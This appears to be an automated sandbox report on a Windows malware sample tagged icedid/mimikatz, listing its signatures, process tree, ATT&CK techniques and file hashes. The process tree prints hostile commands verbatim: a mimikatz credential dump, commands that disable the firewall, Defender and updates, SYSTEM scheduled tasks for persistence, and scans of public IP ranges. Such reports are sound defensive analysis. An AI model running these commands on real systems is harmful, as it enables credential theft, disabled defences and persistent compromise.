Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
-
submitted
03/05/2024, 04:56
General
-
Target
2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exe
-
Size
8.9MB
-
MD5
5e6a68f105d95ba6c52387c649436358
-
SHA1
cff5c065b237b0d7711748961e7468bba5e5fc68
-
SHA256
273c5e335b5e885b8c77a2359e2a6f1e85c6cbb824be027c30fcb2ecd3bf3da6
-
SHA512
5f118f39ef05fdcc9c4727d46da3385c8594dc103edc179ca1ae7a7c908399c870ee13f9d4ba490c8a01af5f0486961e5d7e0e162f2dd05552b55f556a177faf
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (30775) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
-
UPX dump on OEP (original entry point) 41 IoCs
-
XMRig Miner payload 12 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Sets file execution options in registry 2 TTPs 40 IoCs
-
Executes dropped EXE 29 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 37 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\pkiileske\citubz.exe"C:\Windows\TEMP\pkiileske\citubz.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\etfblrkh\wrribqi.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
-
-
C:\Windows\etfblrkh\wrribqi.exeC:\Windows\etfblrkh\wrribqi.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\etfblrkh\wrribqi.exeC:\Windows\etfblrkh\wrribqi.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\yfuzwlflh\ezuhehlec\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\yfuzwlflh\ezuhehlec\wpcap.exeC:\Windows\yfuzwlflh\ezuhehlec\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\yfuzwlflh\ezuhehlec\bilmicikh.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\yfuzwlflh\ezuhehlec\Scant.txt2⤵
-
C:\Windows\yfuzwlflh\ezuhehlec\bilmicikh.exeC:\Windows\yfuzwlflh\ezuhehlec\bilmicikh.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\yfuzwlflh\ezuhehlec\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\yfuzwlflh\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\yfuzwlflh\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\yfuzwlflh\Corporate\vfshost.exeC:\Windows\yfuzwlflh\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "atfbcgbkf" /ru system /tr "cmd /c C:\Windows\ime\wrribqi.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "atfbcgbkf" /ru system /tr "cmd /c C:\Windows\ime\wrribqi.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lrclezizh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\etfblrkh\wrribqi.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "lrclezizh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\etfblrkh\wrribqi.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "epzfgqshg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\pkiileske\citubz.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "epzfgqshg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\pkiileske\citubz.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exeC:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 832 C:\Windows\TEMP\yfuzwlflh\832.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exeC:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 428 C:\Windows\TEMP\yfuzwlflh\428.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exeC:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 1820 C:\Windows\TEMP\yfuzwlflh\1820.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exeC:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 2592 C:\Windows\TEMP\yfuzwlflh\2592.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exeC:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 2752 C:\Windows\TEMP\yfuzwlflh\2752.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exeC:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 2836 C:\Windows\TEMP\yfuzwlflh\2836.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exeC:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 2748 C:\Windows\TEMP\yfuzwlflh\2748.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exeC:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 3760 C:\Windows\TEMP\yfuzwlflh\3760.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exeC:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 3844 C:\Windows\TEMP\yfuzwlflh\3844.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exeC:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 3908 C:\Windows\TEMP\yfuzwlflh\3908.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exeC:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 3988 C:\Windows\TEMP\yfuzwlflh\3988.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exeC:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 5112 C:\Windows\TEMP\yfuzwlflh\5112.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exeC:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 1656 C:\Windows\TEMP\yfuzwlflh\1656.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exeC:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 3956 C:\Windows\TEMP\yfuzwlflh\3956.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exeC:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 4464 C:\Windows\TEMP\yfuzwlflh\4464.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exeC:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 2844 C:\Windows\TEMP\yfuzwlflh\2844.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exeC:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 2612 C:\Windows\TEMP\yfuzwlflh\2612.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exeC:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 5004 C:\Windows\TEMP\yfuzwlflh\5004.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\yfuzwlflh\ezuhehlec\scan.bat2⤵
-
C:\Windows\yfuzwlflh\ezuhehlec\gspkhusbb.exegspkhusbb.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\qicmew.exeC:\Windows\SysWOW64\qicmew.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\pkiileske\citubz.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\pkiileske\citubz.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\wrribqi.exe1⤵
-
C:\Windows\ime\wrribqi.exeC:\Windows\ime\wrribqi.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\etfblrkh\wrribqi.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\etfblrkh\wrribqi.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\pkiileske\citubz.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\pkiileske\citubz.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\wrribqi.exe1⤵
-
C:\Windows\ime\wrribqi.exeC:\Windows\ime\wrribqi.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\etfblrkh\wrribqi.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\etfblrkh\wrribqi.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
25.7MB
MD5ebe8447a6e9c56c33a2b798be337fdd7
SHA170412b5b87ef2d17d3f846269d469d4324174526
SHA2565c1736c71da2c9f6d29d7a5f7531978f915b7b118751ec1d5fac68548f6443c2
SHA5125b541675383329f4f9d0862a9d0177f19f82489f6e3a323975cf9401d08ab68cd660be524f9ce80d367e6eee72b108e89e5d34f5943d0b7c5f28f6209a1f148a
-
Filesize
4.1MB
MD5bf19e7cc09c51aeb199c129e39a62637
SHA1e73a64476c6531898f4c45b3287ba55ba65e8151
SHA256795278fe24ac8e9ae93c46c5c64664ecfd096327a3353274e198ff93fca8c0cf
SHA512270a9059269e116ac73e3c6afd5b2c8c664c3ec55ea9e678b4aacbbcb49f9d0c47c55d47d3dfe7b15ccc99bd0343092f3f8f8290b349d660d411b74d980fb028
-
Filesize
4.1MB
MD51ce09756c36b5d1de036301612547975
SHA19cef058638dde599f68a4db21127724776c2f1f6
SHA256607bdfa67aa32ba67b285bc374c143ca738ebe569342b47a9e30f0e943dbb5f1
SHA5126d39a42cb053eef26b8d2e983a5a4cd89e513becf9d6d5993d17504ba09e592aba80b52515b48e327a3fd8d4798330963f22614daaa3fd3bf25eaeef68d0a48b
-
Filesize
810KB
MD5fa603f9cc9ff0bd28a21cc3d0c95726f
SHA10d8d91b84c96d4dfd503cf4684a25b975ba33c64
SHA256b390d318c8060c31203eb5ff73fe0199ac25f64df2cba7c8df51c11a48eedb32
SHA512f459b57bfdf6a933d176c059f8173cff373bc0c4f157506532527cdc07752ed59cac8de8d0b3be70277bbd98a3ea3d478124862345ef7522118b6913cd668f9a
-
Filesize
7.6MB
MD5391bfb5d9a8ed0faaf4d60c2f40ed502
SHA1d84ea1987c79343a8ed940d15986985638f991c4
SHA2567ac6b37eaa626c34b851a0336e6ff74e18cf5c12b2d74ac482c1571d39427fab
SHA5124a709be4b833976e8f98cb4d979605b77e8abd8335e3624a2053cef49a486e744cabe8a3c93560b4566697d7435419ad96d4d69011ea5d8b62cc966bc33867c1
-
Filesize
2.9MB
MD59e14faad4c06ee40ff143f6dbba82436
SHA122507ecfeaa9ccabad2c89873efaf4aab84d61b5
SHA2561febb81d7acd0785bc8ba5e0ca2649a7dce66ba67c3c2b20b54c65b95a5c0efd
SHA512035d4de3f6d17a19e043d33535ac6302d2dd6cfa19f6aaf6b09eed16d9aa7934b91ee2fbec9b51ac57630de2d5cfbd8a63b6666b66f5b6c7a02fc2141e3bcfb5
-
Filesize
2.9MB
MD53e0bd3242250fc108e2479549cf341c8
SHA11a4b2890dc62ae2c4e33440820cfaad6b5ad29a7
SHA2566d525a7ac33f0c84860e55e4b81bb76ea6de72169dcfaf1abf29b144db1b9470
SHA5123c94e27ae60f7e10f1ac274fe8e56af700f78fa507c85af5a73b44bd2c07d4310b08ccf3ed80a70ec068be6b7bdb143d5eb0eb5f9429ea666854fdc3ebc0fdd0
-
Filesize
20.5MB
MD5cfa1366ebc3a9c1f31d7c334459c6a7f
SHA1327d423157747ff5df087a041fd1f59c8c84df02
SHA256f088dddba200dac4841bc967f6cca48c1672393605f2f2dcb546ac80b8ea7a1b
SHA512c1b2f6e888498436c49a4509d051910f420ceaa54acbe5782431281614227951003b0e08a4e988f0163b2df545378423d914219aca5d320ade825ec13da09c5e
-
Filesize
4.6MB
MD57d28faffdc64a776a938f164a73f2ab7
SHA1ebe300ba4ed32db0a926f9971a348b765f954344
SHA25644c5ae4a8a9a705932debba96b81b504ce9c85a31b20c9d1656fe8ae88211cc6
SHA512a842ba4e717b008479e58d1a0e282af7bc07b035a9d1ff8938c9e7ee17d1797e4eb235c703624c29871879f6017075fef2370175fdc28d2739cb3958c8b06f2a
-
Filesize
8.7MB
MD501ae07bd7cc3b8e2aced954bf50f8b68
SHA1d9c4f777d1f8df8fe718668958d35831843ffbb7
SHA25682a7d80171dbec7cd55cf9056105340b83697c0bfb45badebd7495d9a8950a7e
SHA51283d0f3242be17105f2b814b88ae90bf2844fccb9b6413013c5f00d52fade08b1ff9e7ebc301281268b5eb90cdcb0a1aac0c12d5728c0ef1fa66275cea7e08948
-
Filesize
45.4MB
MD59615f08b9397492ea79b76bdd2be26b6
SHA14ce1f48db85c2127544535ed515401e3fe18762c
SHA256a2c5a36d43039064122f9d75485194d42e14c5e3c922e824bfffdc8a90e41df4
SHA5127164d1bdb80472bfd3b984d091884febc813e9d4aa410b42bee5a5733d12bd0cad884f147c4c6f92fedda581011a9e98d2c08ee564af1c6f63629ac8615a5bd9
-
Filesize
33.6MB
MD558d1b5f08f578b4c2746d9dd88ab26e0
SHA1f9a3c610d24b2af62a90e7c9f907006ac08538e2
